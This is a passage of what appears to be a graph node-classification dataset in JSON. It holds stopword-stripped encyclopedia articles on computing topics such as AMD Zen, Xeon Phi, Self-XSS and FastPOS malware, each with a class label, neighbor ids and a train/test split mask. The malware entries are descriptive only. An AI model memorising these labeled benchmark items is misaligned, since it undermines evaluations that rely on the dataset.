revealed k12 delayed favor zen design allow enter market within 2016 timeframe release first zen-based processors expected october 2016 november 2015 source inside amd reported zen microprocessors tested met expectations significant bottlenecks found december 2015 rumored samsung may contracted fabricator amd 14 nm finfet processors including zen amd then-upcoming polaris gpu architecture clarified amd july 2016 announcement products successfully produced samsung 14 nm finfet process amd stated samsung would used needed arguing would reduce risk amd decreasing dependence one foundry processors based zen use 14 nm finfet silicon processors reportedly produced globalfoundries tsmc prior zen amd smallest process size 28 nm utilized steamroller excavator microarchitectures immediate competition intel skylake kaby lake microarchitecture also fabricated 14 nm finfet though intel planned begin release 10 nm parts later 2017 comparison intel 14 nm finfet amd claimed february 2017 zen cores would 10 smaller intel later announced july 2018 10nm mainstream processors expected second half 2019 identical designs die shrinks would use less current power frequency voltage cpus usually power limited typically ~125w ~45w mobile smaller transistors allow either lower power frequency higher frequency power one zen major goals 2016 focus performance per-core targeting 40 improvement instructions per cycle ipc predecessor excavator comparison offered 4–15 improvement previous architectures amd announced final zen microarchitecture actually achieved 52 improvement ipc excavator inclusion smt also allows core process two threads increasing processing throughput better use available resources zen processors also employ sensors across chip dynamically scale frequency voltage allows maximum frequency dynamically automatically defined processor based upon available cooling amd demonstrated 8-core/16-thread zen processor outperforming equally-clocked intel broadwell-e processor blender rendering handbrake benchmarks zen supports avx2 requires two clock cycles complete avx2 instruction compared intel one zen supports ddr4 memory eight channels ecc pre-release reports stated apus using zen architecture would also support high bandwidth memory hbm however first demonstrated apu use hbm previous apus amd relied shared memory gpu cpu processors built 14 nm node finfet silicon show reduced power consumption therefore heat 28 nm 32 nm non-finfet predecessors equivalent designs computationally powerful equivalent heat output/power consumption zen also uses clock gating reducing frequency underutilized portions core save power comes frome amd sensemi technology using sensors across chip dynamically scale frequency voltage zen added support amd secure memory encryption sme amd secure encrypted virtualization sev secure memory encryption real-time memory encryption done per page table entry encryption occurs hardware aes engine keys managed onboard security processor arm cortex-a5 boot time encrypt page allowing ddr4 memory including non-volatile varieties encrypted amd sme also makes contents memory resistant memory snooping cold boot attacks secure encrypted virtualization sev feature allows memory contents virtual machine vm transparently encrypted key unique guest vm memory controller contains high-performance encryption engine programmed multiple keys use different vms system programming management keys handled amd secure processor firmware exposes api tasks incorporating much southbridge soc zen cpu includes sata usb pci express nvme links augmented available socket am4 chipsets add connectivity options including additional sata usb connections support amd crossfire nvidia sli amd announcing radeon instinct line argued upcoming zen-based naples server cpu would particularly suited building deep learning systems 128 pcie lanes per naples cpu allows eight instinct cards connect pcie x16 single cpu compares favorably intel xeon line 40 pcie lanes zen architecture used current-generation desktop ryzen cpus also epyc server processors successor opteron processors apus first desktop processors without graphics processing units codenamed summit ridge initially expected start selling end 2016 according amd roadmap first mobile desktop processors amd accelerated processing unit type codenamed raven ridge following late 2017 amd officially delayed zen q1 2017 august 2016 early demonstration architecture showed 8-core/16-thread engineering sample cpu 3.0 ghz december 2016 amd officially announced desktop cpu line ryzen brand release q1 2017 also confirmed server processors would released q2 2017 mobile apus h2 2017 march 2 2017 amd officially launched first zen architecture-based octacore ryzen desktop cpus final clock speeds tdps 3 cpus released q1 2017 demonstrated significant performance-per-watt benefits previous k15h piledriver architecture octacore ryzen desktop cpus demonstrated performance-per-watt comparable intel broadwell octacore cpus march 2017 amd also demonstrated engineering sample server cpu based zen architecture cpu codenamed naples configured dual-socket server platform cpu 32 cores/64 threads first generation ryzen processors ryzen 1000 series ryzen apus identified either g ge suffix name february 2018 amd announced v1000 series embedded zen+vega apus four skus amd announced march 2017 would release server platform based zen codenamed naples second quarter year platform include 1- 2-socket systems cpus multi-processor configurations communicate via amd infinity fabric chip supports eight channels memory 128 pcie 3.0 lanes 64 lanes used cpu-to-cpu communication infinity fabric installed dual-processor configuration amd officially revealed naples brand name epyc may 2017 june 20 2017 amd officially released epyc 7000 series cpus launch event austin texas february 2018 amd also announced epyc 3000 series embedded zen cpus",
    "neighbors": [
      3586,
      8322,
      5380,
      9475,
      6151,
      8327,
      3337,
      10375,
      5645,
      398,
      5649,
      6033,
      9369,
      8090,
      7963,
      9500,
      2719,
      9122,
      2339,
      5541,
      11047,
      2088,
      1322,
      2094,
      11183,
      1329,
      6705,
      7218,
      7858,
      1461,
      10675,
      1463,
      9400,
      1085,
      833,
      6978,
      7234,
      9541,
      11080,
      2764,
      3323,
      7247,
      977,
      5329,
      7122,
      9427,
      9428,
      3070,
      9551,
      473,
      731,
      8795,
      9435,
      5859,
      7783,
      1000,
      1260,
      1005,
      5356,
      9582,
      9964,
      1137,
      4465,
      10734,
      2549,
      4603,
      4217,
      11130,
      1915,
      10620,
      638,
      7039
    ],
    "mask": "None"
  },
  {
    "node_id": 9093,
    "label": 3,
    "text": "Mappy:mappy player guides mappy police mouse mansion cats called meowkies mewkies japan retrieve stolen goods player uses left-right joystick move mappy single button operate doors mansion six floors hallways four five versions stolen items stashed mappy cats move floors bouncing trampolines various places house mappy cats land floor way way mappy passes cats air mappy unharmed mappy runs cat anywhere else lose life trampolines break mappy bounces four times row trampolines change color depending many times mappy used without rest addition meowkies boss cat goro nyamco japanese also roams around faster less aggressive meowkies throughout levels goro hides behind different recoverable objects mappy recovers item goro hiding behind player receives 1000 points addition score item current world record score set may 12 2019 marc holliday marc holliday scored 3,423,470 points beating previous record 2,313,890 held mike kasper opening closing doors important feature game doors open towards doorknobs opening door cat near score 50 points stun cat knocking meowkie goro backwards meowkies open doors go open ones goro open door opens away blue doors opened blast slow moving microwave direction doorknob trap cats touches remove board wave reaches edge screen cats caught points gained goro trapped wave score doubled cats removed way return shortly round completed loot retrieved player takes longer usual clear round hurry message appears music speeds cats move quickly aggressively meowkies added two appear ready drop meowkies normally immediately following hurry message meowkies arrive later player takes much longer green disc goro face named gosenzo coin drop onto top-middle platform chase mappy effectively meowkies kill jumping gosenzo open doors stopped microwave doors objects third round every fourth round bonus round mappy unbothered cats must bounce across series trampolines popping fifteen different suspended red balloons 200 pts goro 2000 points along way bonus 5000 pts awarded balloons popped music ends every bonus round new feature added gameplay bells freeze cats hurry message also appear sooner 256 levels japan-only port game initially released famicom japanese version nes msx 1984 followed later port sega game gear 1991 followed video game console-only sequel called mappy-land 1986 released united states taxan 1998 re-released part microsoft revenge arcade pc mappy also several japan-only sequels including hopping mappy 1986 arcades mappy kids 1989 famicom also version called mappy arrangement released 1995 part namco classic collection vol 1 1995 arcades famicom version original mappy re-released japan part famicom mini series 2004 mappy included ms. pac-man collection manufactured jakks pacific also featured 1996 game boy compilation namco gallery vol 1 later released xbox gamecube pc playstation 2 2005 appear game boy advance version also appears namco museum ds mappy also re-released part pac-man arcade party arcade machine 2010 mappy playable playstation portable version namco museum battle collection mappy included dot-s set also one first arcade titles released virtual console 2002 released japan pachinko title mappy park 2003 two mobile games released japan titles 2009 titled september 2011 new mobile game titled bandai namco games bringing back series titled ios 2015 japan part bandai namco shiftylook initiative animated mappy web series titled mappy beat announced 2012 series written directed scott kurtz kris straub also performed character voices presented using limited animation style blamimations series story follows mappy working thankless job security guard former foe goro company nyamco accompanied friends fellow nyamco employees laid-back digging-obsessed dig dug dim good-natured sky kid along bandai namco characters working office mappy beat premiered shiftylook youtube channel july 22 2013 ran 13 episodes roughly eight minutes length final episode released january 20 2014 kurtz also made guest appearance mappy concurrent bravoman animated series bravoman turn appearing final story arc mappy portrayed guest voice dax gordine following closure shiftylook channel removed youtube making episodes longer available",
    "neighbors": [
      1060,
      9081,
      2540,
      10316,
      9006,
      10287,
      1776,
      10544,
      10931,
      6452,
      5717,
      8663,
      4216,
      5753
    ],
    "mask": "None"
  },
  {
    "node_id": 9094,
    "label": 7,
    "text": "Open_Architecture_Computing_Environment:open architecture computing environment open architecture computing environment oace specification aimed provide standards-based computing environment order decouple computing environment software applications proposed united states department defense 2004",
    "neighbors": [
      6419
    ],
    "mask": "Test"
  },
  {
    "node_id": 9095,
    "label": 3,
    "text": "Xeon_Phi:xeon phi xeon phi series x86 manycore processors designed made intel intended use supercomputers servers high-end workstations architecture allows use standard programming languages apis openmp since originally based earlier gpu design intel shares application areas gpus main difference xeon phi gpgpu like nvidia tesla xeon phi x86-compatible core less modification run software originally targeted standard x86 cpu initially form pcie-based add-on cards second generation product codenamed knights landing announced june 2013 second generation chips could used standalone cpu rather add-in card june 2013 tianhe-2 supercomputer national supercomputer center guangzhou nscc-gz announced world fastest supercomputer used intel xeon phi coprocessors ivy bridge-ep xeon processors achieve 33.86 petaflops xeon phi product line directly competes nvidia tesla amd radeon instinct lines deep learning gpgpu cards larrabee microarchitecture development since 2006 introduced wide 512-bit simd units x86 architecture based processor design extended cache-coherent multiprocessor system connected via ring bus memory core capable four-way multithreading due design intended gpu well general purpose computing larrabee chips also included specialised hardware texture sampling project produce retail gpu product directly larrabee research project terminated may 2010 another contemporary intel research project implementing x86 architecture many-multicore processor 'single-chip cloud computer prototype introduced 2009 design mimicking cloud computing computer datacentre single chip multiple independent cores prototype design included 48 cores per chip hardware support selective frequency voltage control cores maximize energy efficiency incorporated mesh network inter-chip messaging design lacked cache-coherent cores focused principles would allow design scale many cores teraflops research chip prototype unveiled 2007 experimental 80-core chip two floating point units per core implementing 96-bit vliw architecture instead x86 architecture project investigated intercore communication methods per-chip power management achieved 1.01 tflops 3.16 ghz consuming 62 w power intel many integrated core mic prototype board named knights ferry incorporating processor codenamed aubrey isle announced 31 may 2010 product stated derivative larrabee project intel research including single-chip cloud computer development product offered pcie card 32 in-order cores 1.2 ghz four threads per core 2 gb gddr5 memory 8 mb coherent l2 cache 256 kb per core 32 kb l1 cache power requirement ~300 w built 45 nm process aubrey isle core 1,024-bit ring bus 512-bit bi-directional connects processors main memory single board performance exceeded 750 gflops prototype boards support single precision floating point instructions initial developers included cern korea institute science technology information kisti leibniz supercomputing centre hardware vendors prototype boards included ibm sgi hp dell others knights corner product line made 22 nm process size using intel tri-gate technology 50 cores per chip intel first many-cores commercial product june 2011 sgi announced partnership intel use mic architecture high performance computing products september 2011 announced texas advanced computing center tacc use knights corner cards 10 petaflops stampede supercomputer providing 8 petaflops compute power according stampede comprehensive petascale computing environment second generation intel knights landing mics added become available increasing stampede aggregate peak performance least 15 petaflops 15 november 2011 intel showed early silicon version knights corner processor 5 june 2012 intel released open source software documentation regarding knights corner 18 june 2012 intel announced 2012 hamburg international supercomputing conference xeon phi brand name used products based many integrated core architecture june 2012 cray announced would offering 22 nm 'knight corner chips branded 'xeon phi co-processor 'cascade systems june 2012 scalemp announced virtualization update allowing xeon phi transparent processor extension allowing legacy mmx/sse code run without code changes important component intel xeon phi coprocessor core vector processing unit vpu vpu features novel 512-bit simd instruction set officially known intel initial many core instructions intel imci thus vpu execute 16 single-precision sp 8 double-precision dp operations per cycle vpu also supports fused multiply-add fma instructions hence execute 32 sp 16 dp floating point operations per cycle also provides support integers vpu also features extended math unit emu execute operations reciprocal square root logarithm thereby allowing operations executed vector fashion high bandwidth emu operates calculating polynomial approximations functions 12 november 2012 intel announced two xeon phi coprocessor families using 22 nm process size xeon phi 3100 xeon phi 5110p xeon phi 3100 capable 1 teraflops double precision floating point instructions 240 gbit/s memory bandwidth 300 w. xeon phi 5110p capable 1.01 teraflops double precision floating point instructions 320 gbit/s memory bandwidth 225 w. xeon phi 7120p capable 1.2 teraflops double precision floating point instructions 352 gbit/s memory bandwidth 300 w. 17 june 2013 tianhe-2 supercomputer announced top500 world fastest tianhe-2 used intel ivy bridge xeon xeon phi processors achieve 33.86 petaflops fastest list two half years lastly november 2015 cores knights corner based modified version p54c design used original pentium basis intel mic architecture leverage x86 legacy creating x86-compatible multiprocessor architecture use existing parallelization software tools programming tools include openmp opencl cilk/cilk plus specialised versions intel fortran c++ math libraries design elements inherited larrabee project include x86 isa 4-way smt per core 512-bit simd units 32 kb l1 instruction cache 32 kb l1 data cache coherent l2 cache 512 kb per core ultra-wide ring bus connecting processors memory knights corner instruction set documentation available intel code name second generation mic architecture product intel intel officially first revealed details second generation intel xeon phi products 17 june 2013 intel said next generation intel mic architecture-based products available two forms coprocessor host processor cpu manufactured using intel 14 nm process technology knights landing products include integrated on-package memory significantly higher memory bandwidth knights landing contains 72 airmont atom cores four threads per core using lga 3647 socket supporting 384 gb far ddr4 2133 ram 8–16 gb stacked near 3d mcdram version hybrid memory cube core two 512-bit vector units supports avx-512 simd instructions specifically intel avx-512 foundational instructions avx-512f intel avx-512 conflict detection instructions avx-512cd intel avx-512 exponential reciprocal instructions avx-512er intel avx-512 prefetch instructions avx-512pf national energy research scientific computing center announced phase 2 newest supercomputing system cori would use knights landing xeon phi coprocessors 20 june 2016 intel launched intel xeon phi product family x200 based knights landing architecture stressing applicability traditional simulation workloads also machine learning model lineup announced launch included xeon phi bootable form-factor two versions standard processors processors integrated intel omni-path architecture fabric latter denoted suffix f model number integrated fabric expected provide better latency lower cost discrete high-performance network cards 14 november 2016 48th list top500 contained 10 systems using knights landing platforms pcie based co-processor variant knight landing never offered general market discontinued august 2017 included 7220a 7240p 7220p coprocessor cards intel announced discontinuing knights landing summer 2018 models boost peak speeds adding 200 mhz base frequency running one two cores running three maximum number cores chips boost 100 mhz base frequency chips run high-avx code frequency reduced 200 mhz knights hill codename third-generation mic architecture intel announced first details sc14 manufactured 10 nm process knights hill expected used united states department energy aurora supercomputer deployed argonne national laboratory however aurora delayed favor using advanced architecture focus machine learning 2017 intel announced knights hill canceled favor another architecture built ground enable exascale computing future new architecture expected 2020–2021 terms exascale computing high performance computing hpc got meanwhile linked intel towards term omni-path architecture opa publications knights mill intel codename xeon phi product specialized deep learning initially released december 2017 nearly identical specifications knights landing knights mill includes optimizations better utilization avx-512 instructions enables 4-way hyperthreading single-precision variable-precision floating-point performance increased expense double-precision floating-point performance empirical performance programmability study performed researchers authors claim achieving high performance xeon phi still needs help programmers merely relying compilers traditional programming models still far reality however research various domains life sciences deep learning computer-aided engineering demonstrated exploiting thread- simd-parallelism xeon phi achieves significant speed-ups",
    "neighbors": [
      3459,
      5380,
      2821,
      3973,
      8325,
      7432,
      5386,
      9611,
      4108,
      9741,
      4622,
      5649,
      10641,
      5523,
      6804,
      7699,
      4886,
      8851,
      3352,
      9111,
      6818,
      10021,
      6311,
      10669,
      9391,
      8624,
      7218,
      10675,
      4276,
      1461,
      10548,
      9911,
      7097,
      2237,
      5309,
      8125,
      8126,
      833,
      6339,
      5444,
      6858,
      1998,
      2638,
      1489,
      5073,
      342,
      7134,
      1119,
      4194,
      613,
      3175,
      1000,
      7657,
      1260,
      4204,
      5356,
      5871,
      1776,
      8684,
      10734,
      499,
      8820,
      3317,
      630,
      4217,
      5883,
      5503
    ],
    "mask": "Test"
  },
  {
    "node_id": 9096,
    "label": 4,
    "text": "Self-XSS:self-xss self-xss social engineering attack used gain control victims web accounts self-xss attack victim attack unknowingly runs malicious code web browser thus exposing attacker self-xss operates tricking users copying pasting malicious content browsers web developer console usually attacker posts message says copying running certain code user able hack another user account fact code allows attacker hijack victim account past similar attack took place users tricked pasting malicious javascript address bar browser vendors stopped preventing easily running javascript address bar attackers started using self-xss current form web browser vendors web sites taken steps mitigate attack mozilla firefox google chrome begun implementing safeguards warn users self-xss attacks facebook google+ others display warning message users open web developer console link pages explaining attack detail self part name comes fact user attacking themself xss part name comes abbreviation cross-site scripting attacks result malicious code running legitimate site however attacks n't much else common xss attack website users protect fixed site operator making site secure whereas self-xss social engineering attack user savvy users protect site operator anything",
    "neighbors": [
      4198,
      3462,
      9055
    ],
    "mask": "Train"
  },
  {
    "node_id": 9097,
    "label": 8,
    "text": "Adobe_Atmosphere:adobe atmosphere adobe atmosphere informally abbreviated atmo software platform interacting 3d computer graphics 3d models created commercial program could explored socially using browser plugin available free charge atmosphere originally developed attitude software 3d anarchy later bought adobe systems product spent majority lifetime beta testing adobe released last version atmosphere version 1.0 build 216 february 2004 discontinued software december year atmosphere focused explorable worlds later officially called environments linked together portals analogous world wide web hyperlinks portals represented spinning squares red green blue revolved around floated ground portals indicative atmosphere team desire mirror functionality web pages although world described codice_1 codice_2 file images sounds kept separately usually gif wav mp3 format objects worlds scriptable using specialized dialect javascript allowing immersive environment worlds could generated dynamically using php using javascript world author could link object web page user could example launch web page clicking billboard advertisement ctrl+shift+click earlier versions version 1.0 atmosphere also boasted support using macromedia flash animations windows media video textures atmosphere-based worlds consisted mainly parametric primitives floors walls cones primitives could painted solid color given image-based texture made subtractive invisible subtractive primitives could used cut holes primitives build complex shapes many worlds also contained animated polygon meshes made possible atmosphere implementation subcomponent viewpoint corporation viewpoint media player however viewpoint stopped supporting atmosphere subcomponent time atmosphere discontinued unlike centralized structure active worlds environments primarily built within alphaworld atmosphere worlds spread throughout internet usually hosted author web site codice_1 files binary ascii versions codice_1 file format though ascii format phased later releases codice_1 files could generated dynamically using server-side content management systems demonstrated atmoworlds.com worlds directory users represented worlds avatars later builds option allowed user see avatar early quirk atmosphere displayed users whose avatars yet loaded colorful slanted cylinders announced arrival users bug zapper sound whereas activeworlds possible communicate users within 200-meter radius atmosphere users could chat users world model appropriate atmosphere considering smaller sizes worlds technically users could chat anyone yacp channel reference irc protocol see exception worlds would receive many visitors often case homeworld worlds would clone creating duplicate channels world would often cause confusion users. ref name= patent 9/788526 /ref world developers wrote scripts limited communication users within certain distance greater realism built-in havok physics engine detailed rendering dynamic lighting support lighting effects like radiosity distance fog glare also contributed realism atmosphere worlds many world authors wanted create large worlds order build realistic cities example worlds would often take excessive amount time load visitor web browser especially visitor using slower dial-up connection alleviate issue atmosphere supported pattern reminiscent inline frames html sections world – subworlds models – would load user neared city could load block block rather one atmosphere problems however excessive memory usage exacerbated use advanced features embedded models flash movies many worlds atmosphere chat console used windows-1252 character encoding inception adobe photoshop album included 3d gallery feature could publish photo album atmosphere world adobe atmosphere began 3d anarchy attitude software originally relied irc chat functionality original user interface rather eccentric featuring two ever-present eyeballs would occasionally blink later versions adopted conventional interface although one pre-supplied avatars based eyes adobe bought technology attitude november 1999 announced first public beta version new name march 26 2001 atmosphere came two stand-alone applications builder used build online worlds player allowed users explore worlds 3d anarchy components called editor chat respectively addition applications adobe provided browser plugin explore worlds within web browser companion chat server called adobe community server ran irc-like protocol known yet another chat protocol yacp beta-testing three components atmosphere available free charge adobe distributed server software atmosphere open source license permissive open source license beta versions builder notoriously unstable program crashed frequently user wrote program automatically saved worlds opened builder fixed interval preventing users losing hours work august 2002 adobe began scrap stand-alone player instead devoting resources develop atmosphere plugin time viewed buggy less attractive alternative player company focus plugin viewed attempt compete flash developer macromedia purchased adobe part plugin ran internet explorer windows despite frequent requests community members expand atmosphere support mozilla-based browsers linux mac os unofficially plugin ran mozilla-based browsers limited functionality one user able run stand-alone player linux using wine albeit less-than-usable state part efforts garner commercial interest software adobe introduced support embedding atmosphere worlds pdf documents viewing acrobat reader company also distanced atmosphere reputation platform online chat first disabling chat various official adobe-hosted worlds deleting worlds version 1.0 released october 22 2003 point adobe decided charge builder simply renamed atmosphere continue provide plugin server free beta-testing program ended adobe sent free copies builder registered beta-testers late 2003 early 2004 via airborne express dhl following long period relative silence developers adobe announced december 2004 would continue development software according faq adobe adobe retains copyright atmosphere give permission others distribute copies software company decision stop making builder available purchase essentially halted creation new worlds plugin remains available free download adobe ftp site however adobe still provides 3d capabilities popular adobe acrobat product features developed using technology new zealand right hemisphere rather using atmosphere nearly atmosphere development team went work acrobat team atmosphere component still use adobe scripting api atmosphere components including scene graphs physics engine licensed companies viewpoint atmosphere dedicated beta-testing community whose members constructed many worlds avatars promoted software word mouth conducted community events world tours building contests largest contests star wars 3d large-scale effort create comprehensive set worlds avatars based star wars trilogy creations unveiled july 4 2003 festivities officially continued july 6 another large effort held themed lord rings trilogy community members also organized attended events world tours featured innovative worlds week tech talks originally weekly event intended world avatar developers initially community discussion occurred either worlds appropriate adobe user-to-user forums later supplement official atmosphere product web site discussion forums community created large number resource web sites listed beta-testers dubbed atmosphere developers zombies recognition long hours adobe employees apparently spent developing software running joke team instead typical meal brains atmosphere zombies ingested eyeballs due visual nature product beta-testing community eagerly awaited new releases development team developers invariably answered would take two weeks response became euphemism ready despite decentralized structure atmosphere popularity world-building contests atmosphere community still preferred gather worlds created adobe partner digitalspace adobe annually-revamped homeworld digitalspace atmospherians community homeworld primary starting place new users community found easier establish lively crowds adobe shut homeworld along number adobe-hosted worlds many builders made attempts emulating success homeworld starting points however without constant stream new users homeworld experienced attempts failed attract small group regulars years adobe ended support atmosphere worlds remain online though maintained fewer still continue support multi-user chat nonetheless software continues enjoy small fanbase meets online year halloween",
    "neighbors": [
      5251,
      3462,
      1801,
      6797,
      3350,
      11291,
      7983,
      8627,
      8628,
      823,
      5048,
      3137,
      7364,
      8644,
      1632,
      225,
      11237,
      10097,
      119,
      1916,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9098,
    "label": 7,
    "text": "Wireless_mesh_network:wireless mesh network wireless mesh network wmn communications network made radio nodes organized mesh topology also form wireless ad hoc network mesh refers rich interconnection among devices nodes wireless mesh networks often consist mesh clients mesh routers gateways mobility nodes less frequent nodes constantly frequently move mesh spends time updating routes delivering data wireless mesh network topology tends static routes computation converge delivery data destinations occur hence low-mobility centralized form wireless ad hoc network also sometimes relies static nodes act gateways truly all-wireless ad hoc network mesh clients often laptops cell phones wireless devices mesh routers forward traffic gateways may need connected internet coverage area radio nodes working single network sometimes called mesh cloud access mesh cloud depends radio nodes working together create radio network mesh network reliable offers redundancy one node longer operate rest nodes still communicate directly one intermediate nodes wireless mesh networks self form self heal wireless mesh networks work different wireless technologies including 802.11 802.15 802.16 cellular technologies need restricted one technology protocol see also mesh networking wireless mesh architecture first step towards providing cost effective low mobility specific coverage area wireless mesh infrastructure effect network routers minus cabling nodes built peer radio devices cabled wired port like traditional wlan access points ap mesh infrastructure carries data large distances splitting distance series short hops intermediate nodes boost signal cooperatively pass data point point b making forwarding decisions based knowledge network i.e perform routing first deriving topology network wireless mesh networks relatively stable-topology network except occasional failure nodes addition new nodes path traffic aggregated large number end users changes infrequently practically traffic infrastructure mesh network either forwarded gateway wireless ad hoc networks client mesh networks traffic flows arbitrary pairs nodes rate mobility among nodes high i.e. link breaks happen frequently wireless mesh networks start break low communication performance type infrastructure decentralized central server centrally managed central server relatively inexpensive reliable resilient node needs transmit far next node nodes act routers transmit data nearby nodes peers far away reach single hop resulting network span larger distances topology mesh network must relatively stable i.e. much mobility one node drops network due hardware failure reason neighbors quickly find another route using routing protocol mesh networks may involve either fixed mobile devices solutions diverse communication needs example difficult environments emergency situations tunnels oil rigs battlefield surveillance high-speed mobile-video applications board public transport real-time racing-car telemetry self-organizing internet access communities important possible application wireless mesh networks voip using quality service scheme wireless mesh may support routing local telephone calls mesh applications wireless mesh networks similar wireless ad hoc networks current applications principle similar way packets travel around wired internet—data hops one device another eventually reaches destination dynamic routing algorithms implemented device allow happen implement dynamic routing protocols device needs communicate routing information devices network device determines data receives – either pass next device keep depending protocol routing algorithm used attempt always ensure data takes appropriate fastest route destination multi-radio mesh refers different radios operating different frequencies interconnect nodes mesh means unique frequency used wireless hop thus dedicated csma collision domain radio bands communication throughput likely increase result available communication channels similar providing dual multiple radio paths transmit receive data one often cited papers wireless mesh networks identified following areas open research problems 2005 70 competing schemes routing packets across mesh networks include ieee developed set standards title 802.11s less thorough list found ad hoc routing protocol list standard autoconfiguration protocols dhcp ipv6 stateless autoconfiguration may used mesh networks mesh network specific autoconfiguration protocols include",
    "neighbors": [
      11267,
      5382,
      5132,
      2829,
      527,
      6419,
      2466,
      10021,
      3751,
      686,
      11696,
      10550,
      7232,
      8640,
      1733,
      11077,
      3016,
      9933,
      11094,
      5978,
      11483,
      5470,
      8160,
      5092,
      6267
    ],
    "mask": "Test"
  },
  {
    "node_id": 9099,
    "label": 8,
    "text": "Shiftboard:shiftboard shiftboard community online scheduling recruitment time management tool lets individuals groups participating organizations within community collaborate participation overall staff work coverage general accountability employee scheduling software similar job board communications online forum shiftboard provides work portals used large small civic non-profit/arts charity global healthcare municipal staffing organizations shiftboard active member open source software community located seattle washington united states",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 9100,
    "label": 2,
    "text": "Apple_Icon_Image_format:apple icon image format apple icon image format icon format used apple inc. macos supports icons 16 × 16 32 × 32 48 × 48 128 × 128 256 × 256 512 × 512 1024 × 1024 pixels 1- 8-bit alpha channels multiple image states example open closed folders fixed-size icons scaled operating system displayed intermediate size file format consists 8 byte header followed number icons time format improved support compression parts pixel data 32-bit is32 il32 ih32 it32 argb ic04 ic05 pixel data often compressed per channel format similar packbits sources mentioned os supports compressed uncompressed data chunks following pseudocode decompresses data example decompress various image viewers load *.icns files free open source converters png also exist gtk+ load *.icns resources since 2007 tools supporting format include apple icon composer icns browser iconfactory iconbuilder br macos offers built-in codice_1 command line tool pack unpack *.icns files",
    "neighbors": [
      4615,
      4111,
      5647,
      1042,
      6700,
      4657,
      1074,
      9802,
      5713,
      3670,
      4184,
      2141,
      4702,
      2149,
      8303,
      6771,
      2676,
      9343,
      3719,
      10888,
      1162,
      11402,
      6797,
      8852,
      1686,
      7318,
      3228,
      2207,
      1699,
      5292,
      8877,
      1710,
      3766,
      2232,
      9912,
      9406,
      1729,
      6849,
      713,
      9418,
      3790,
      9430,
      3289,
      4318,
      231,
      9451,
      2288,
      7928,
      8441,
      7422,
      11521,
      2819,
      1796,
      6408,
      10512,
      4888,
      11037,
      811,
      3371,
      10036,
      9529,
      1347,
      4933,
      9035,
      1878,
      4457,
      9109,
      1439,
      8627,
      8628,
      6093,
      7118,
      3035,
      4571,
      4068,
      5093,
      487,
      10221,
      5619,
      11257,
      7163
    ],
    "mask": "None"
  },
  {
    "node_id": 9101,
    "label": 2,
    "text": "Index_of_articles_related_to_BlackBerry_OS:index articles related blackberry os list blackberry-related topics",
    "neighbors": [
      2179,
      9366,
      410,
      2208,
      5546,
      9391,
      690,
      1083,
      9408,
      2892,
      3152,
      3537,
      2259,
      4194,
      487,
      8044,
      3949,
      9964,
      10619,
      6271
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9102,
    "label": 4,
    "text": "FastPOS:fastpos fastpos variant pos malware discovered trend micro researchers new pos malware foregrounds speed credit card data stolen sent back hackers researchers trend micro named new malware variant tspy_fastpos.smztda malware used hackers target small mid-sized businesses smbs many countries like france taiwan japan brazil hong kong united states unlike pos malware fastpos store information locally send cyber thieves periodically variant pos malware executes attack target infected websites virtual network computing vnc via file sharing service stolen data instantly transferred control command server hardcoded hacker pos malware consists two components– keylogger ram scraper logged keystrokes stored memory transmitted attacker enter key pressed stored file infected system stolen data user credentials payment information depends business procedures ram scraper devised steal credit card data memory scraper designed verify service code credit card help remove cards demands pins",
    "neighbors": [
      3072,
      6786,
      7044,
      10245,
      10756,
      9356,
      9233,
      8978,
      4863,
      4883,
      278,
      10392,
      1690,
      3867,
      10141,
      5281,
      2213,
      8998,
      9256,
      939,
      10364,
      1970,
      3643,
      6588,
      7739,
      9791,
      1088,
      3395,
      4165,
      10309,
      6091,
      2508,
      6360,
      7515,
      4956,
      4344,
      3941,
      107,
      877,
      3320,
      2041,
      127,
      5245,
      1279
    ],
    "mask": "None"
  },
  {
    "node_id": 9103,
    "label": 9,
    "text": "CLIPS:clips clips public domain software tool building expert systems name acronym c language integrated production system syntax name inspired charles forgy ops5 first versions clips developed starting 1985 nasa-johnson space center alternative existing system art*inference mid-1990s development group responsibilities ceased focus expert system technology original name project nasa ai language nail clips probably widely used expert system tool clips written c extensions written c clips called c. syntax resembles programming language lisp clips incorporates complete object-oriented language writing expert systems cool combines programming paradigms procedural object oriented logical theorem proving languages clips uses forward chaining like expert system languages clips deals rules facts various facts make rule applicable applicable rule fired facts rules created first defining shown set reset command causes clips read facts rules case would lead three trouble_shooting facts asserted run command used given two facts listed rule1 asserted conditions action met additional fact asserted result run clips salience allows user assign priority weight rule descendants clips language include jess rule-based portion clips rewritten java later grew different direction fuzzyclips adds concept relevancy language",
    "neighbors": [
      9345,
      8002,
      6502,
      8262,
      5677,
      2045,
      3389,
      6335
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9104,
    "label": 7,
    "text": "Cloudreach:cloudreach cloudreach international cloud computing consultancy specialises planning implementation operational support public cloud services including amazon web services microsoft azure google cloud platform also blackstone group portfolio company company headquartered london uk offices multiple countries around world including canada france germany india netherlands united states switzerland cloudreach advisor integrator enterprises greater 1 billion revenues wish move functions public cloud environments customers include bp hearst met office skyscanner ströer time inc. cloudreach also developed two in-house systems sceptre infrastructure automation suite aws connect integration platform service ipaas whilst competitors connect mulesoft offer cloud-based integration focussed apis online services cloudreach also offers solutions focused purely integration services cloud environments cloudreach founded london 2009 pontus noren james monico three years later 2012 company opened second office edinburgh 2015 report research group fast track said cloudreach among 20 fastest-growing british technology companies february 2017 cloudreach acquired major global investor blackstone undisclosed amount noren cofounder remain ceo dave johnson senior blackstone advisor becoming chairman board directors august 2017 cloudreach acquired two us-based businesses emerging technology advisors cloud professional services company cloudamize cloud migration specialist cloudamize cloud computing analytics platform provides data analysis recommendations speed simplify cloud migration management july 2017 cloudreach announced partnership t-systems subsidiary deutsche telekom july 2018 aaron painter named new ceo cloudreach replacing co-founder pontus noren became vice chairman board directors management change comes cloudreach acquired private equity firm blackstone 2017 august 2018 cloudreach acquired relus cloud atlanta based data analytics specialist acquisition relus cloud cloudreach employs 700 people acquisition cloudreach third since investment firm blackstone bought majority stake company last year",
    "neighbors": [
      4194,
      9252,
      10090,
      1935,
      7248,
      5905,
      530
    ],
    "mask": "None"
  },
  {
    "node_id": 9105,
    "label": 3,
